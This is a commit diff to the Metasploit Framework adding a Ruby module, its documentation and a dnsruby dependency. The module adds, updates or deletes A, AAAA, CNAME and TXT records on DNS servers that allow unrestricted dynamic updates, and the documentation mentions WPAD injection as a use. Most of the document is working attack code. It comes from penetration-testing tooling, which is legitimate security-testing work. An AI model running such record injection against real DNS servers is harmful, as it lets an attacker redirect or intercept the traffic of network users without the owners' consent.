Land rapid7#8599, Dynamic DNS updater module

mubix · mubix · commit 2918b3af13b4 · 2017-06-25T15:08:22.000-05:00
diff --git a/Gemfile.lock b/Gemfile.lock
@@ -8,6 +8,7 @@ PATH
       backports
       bcrypt
       bit-struct
+      dnsruby
       filesize
       jsobfu
       json
@@ -138,6 +139,7 @@ GEM
       railties (>= 4, < 5.2)
     cucumber-wire (0.0.1)
     diff-lcs (1.3)
+    dnsruby (1.60.1)
     docile (1.1.5)
     erubis (2.7.0)
     factory_girl (4.8.0)
diff --git a/documentation/modules/auxiliary/admin/dns/dns_dyn_update.md b/documentation/modules/auxiliary/admin/dns/dns_dyn_update.md
@@ -0,0 +1,30 @@
+# Dynamic DNS Update Injection
+
+`dyn_dns_update` module allows adding or deleting DNS records
+on a DNS server that allows unrestricted dynamic updates.
+
+## Vulnerable Application
+
+Any DNS server that allows dynamic update for none trusted source IPs.
+
+## Verification Steps
+
+ 1. Start msfconsole
+ 2. Do: ```auxiliary/scanner/dns/dyn_dns_update```
+ 3. Do: ```set DOMAIN [IP]```
+ 4. Do: ```set NS [IP]```
+ 5. Do: ```set INJECTDOMAIN [IP]```
+ 6. Do: ```set INJECTIP [IP]```
+ 7. Do: ```set ACTION ADD```
+ 8. Do: ```run```
+
+## Actions
+
+There are two kind of actions the module can run:
+
+ 1. **ADD** - Add a new record. [Default]
+ 2. **DEL** - Delete an existing record.
+
+## Targeting Information
+
+WPAD may not work with Windows 2008+ targets due to a DNS block list: https://technet.microsoft.com/en-us/library/cc995261.aspx
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
@@ -114,6 +114,7 @@ Gem::Specification.new do |spec|
   #
   # Protocol Libraries
   #
+  spec.add_runtime_dependency 'dnsruby'
   spec.add_runtime_dependency 'net-ssh'
   spec.add_runtime_dependency 'ruby_smb'
 
diff --git a/modules/auxiliary/admin/dns/dyn_dns_update.rb b/modules/auxiliary/admin/dns/dyn_dns_update.rb
@@ -0,0 +1,171 @@
+# -*- coding: binary -*-
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'dnsruby'
+
+class MetasploitModule < Msf::Auxiliary
+
+  def initialize
+    super(
+        'Name'           => 'DNS Server Dynamic Update Record Injection',
+        'Description'    => %q{
+        This module allows adding and/or deleting a record to
+        any remote DNS server that allows unrestricted dynamic updates.},
+        'Author'         => [
+          'King Sabri <king.sabri[at]gmail.com>',
+          'Brent Cook <brent_cook[at]rapid7.com>'
+        ],
+        'References'     => [
+          ['URL', 'http://www.tenable.com/plugins/index.php?view=single&id=35372'],
+          ['URL', 'https://github.com/KINGSABRI/CVE-in-Ruby/tree/master/NONE-CVE/DNSInject'],
+          ['URL', 'https://www.christophertruncer.com/dns-modification-dnsinject-nessus-plugin-35372/'],
+          ['URL', 'https://github.com/ChrisTruncer/PenTestScripts/blob/master/DNSInject.py']
+        ],
+        'License'        => MSF_LICENSE,
+        'Actions'        => [
+          ['UPDATE',  {'Description' => 'Add or update a record. (default)'}],
+          ['ADD',     {'Description' => 'Add a new record. Fail if it already exists.'}],
+          ['DELETE',  {'Description' => 'Delete an existing record.'}]
+        ],
+        'DefaultAction' => 'UPDATE'
+    )
+
+    register_options([
+      OptString.new('DOMAIN', [true, 'The domain name']),
+      OptAddress.new('RHOST', [true, 'The vulnerable DNS server IP address']),
+      OptString.new('HOSTNAME', [true, 'The name record you want to add']),
+      OptAddress.new('IP', [false, 'The IP you want to assign to the record']),
+      OptString.new('VALUE', [false, 'The string to be added with TXT or CNAME record']),
+      OptEnum.new('TYPE',  [true, 'The record type you want to add.', 'A', ['A', 'AAAA', 'CNAME', 'TXT']]),
+      OptAddress.new('CHOST', [false, 'The source address to use for queries and updates'])
+    ])
+
+    deregister_options('RPORT')
+  end
+
+  def record_action(type, type_enum, value, action)
+    # Send the update to the zone's primary master.
+    domain = datastore['DOMAIN']
+    fqdn   = "#{datastore['HOSTNAME']}.#{domain}"
+    opts   = {nameserver: datastore['RHOST']}
+    if datastore['CHOST'] && datastore['CHOST'] != ""
+      if Rex::Socket.is_ipv4?(datastore['CHOST'])
+        opts[:src_address] = datastore['CHOST']
+      elsif Rex::Socket.is_ipv6?(datastore['CHOST'])
+        opts[:src_address6] = datastore['CHOST']
+      end
+    end
+    resolver = Dnsruby::Resolver.new(opts)
+    update   = Dnsruby::Update.new(domain)
+    updated  = false
+    case
+      when action == :resolve
+        begin
+          answer = resolver.query(fqdn, type)
+          print_good "Found existing #{type} record for #{fqdn}"
+          return true
+        rescue Dnsruby::ResolvError, IOError => e
+          print_good "Did not find an existing #{type} record for #{fqdn}"
+          vprint_error "Query failed: #{e.message}"
+          return false
+        end
+      when action == :add
+        print_status("Sending dynamic DNS add message...")
+        update.absent("#{fqdn}.", type)
+        update.add("#{fqdn}.", type_enum, 86400, value)
+        begin
+          resolver.send_message(update)
+          print_good "The record '#{fqdn} => #{value}' has been added!"
+          updated = true
+        rescue Dnsruby::ResolvError, IOError => e
+          print_error "Cannot add #{fqdn}"
+          vprint_error "The DNS server may not be vulnerable, or there may be a preexisting static record."
+          vprint_error "Update failed: #{e.message}"
+        end
+      when action == :delete
+        begin
+          print_status("Sending dynamic DNS delete message...")
+          update.present(fqdn, type)
+          update.delete(fqdn, type)
+          resolver.send_message(update)
+          print_good("The record '#{fqdn} => #{value}' has been deleted!")
+          updated = true
+        rescue Dnsruby::ResolvError, IOError => e
+          print_error "Cannot delete #{fqdn}"
+          vprint_error "The DNS server may not be vulnerable, or there may be a preexisting static record."
+          vprint_error "Update failed: #{e.message}"
+        end
+    end
+    updated
+  end
+
+  def update_record(type:, type_enum:, value:, value_name:)
+    if value.nil? || value == ""
+      print_error "Record type #{type} requires the #{value_name} parameter to be specified"
+      return
+    end
+    force = datastore['CHOST'] && datastore['CHOST'] != ""
+    case
+      when action.name == 'UPDATE'
+        if force
+          record_action(type, type_enum, value, :delete)
+          record_action(type, type_enum, value, :add)
+        else
+          if record_action(type, type_enum, value, :resolve)
+            if record_action(type, type_enum, value, :delete)
+              record_action(type, type_enum, value, :add)
+            end
+          else
+            record_action(type, type_enum, value, :add)
+          end
+        end
+      when action.name == 'ADD'
+        if force
+          record_action(type, type_enum, value, :add)
+        else
+          if record_action(type, type_enum, value, :resolve) == false
+            record_action(type, type_enum, value, :add)
+          else
+            print_error "Record already exists, try DELETE or UPDATE"
+          end
+        end
+      when action.name == 'DELETE'
+        if force
+          record_action(type, type_enum, value, :delete)
+        else
+          if record_action(type, type_enum, value, :resolve)
+            record_action(type, type_enum, value, :delete)
+          else
+            print_error "Record does not exist, not deleting"
+          end
+        end
+    end
+  end
+
+  def run
+    ip = datastore['IP']
+    value = datastore['VALUE']
+    begin
+      case
+      when datastore['TYPE'] == 'A'
+        update_record(type: 'A', type_enum: Dnsruby::Types.A, value: ip, value_name: 'IP')
+      when datastore['TYPE'] == 'AAAA'
+        update_record(type: 'AAAA', type_enum: Dnsruby::Types.AAAA, value: ip, value_name: 'IP')
+      when datastore['TYPE'] == 'CNAME'
+        update_record(type: 'CNAME', type_enum: Dnsruby::Types.CNAME, value: value, value_name: 'VALUE')
+      when datastore['TYPE'] == 'TXT'
+        update_record(type: 'TXT', type_enum: Dnsruby::Types.TXT, value: value, value_name: 'VALUE')
+      else
+        print_error "Invalid Record Type!"
+      end
+    rescue ArgumentError => e
+      print_error(e.message)
+    rescue Dnsruby::OtherResolvError
+      print_error("Connection Refused!")
+    rescue Dnsruby::DecodeError
+      print_error("Invalid DNS reply, ensure you are connecting to a DNS server")
+    end
+  end
+end

Original file line number	Diff line number	Diff line change
`@@ -114,6 +114,7 @@ Gem::Specification.new do \|spec\|`
`114`	`114`	`#`
`115`	`115`	`# Protocol Libraries`
`116`	`116`	`#`
	`117`	`+ spec.add_runtime_dependency 'dnsruby'`
`117`	`118`	`spec.add_runtime_dependency 'net-ssh'`
`118`	`119`	`spec.add_runtime_dependency 'ruby_smb'`
`119`	`120`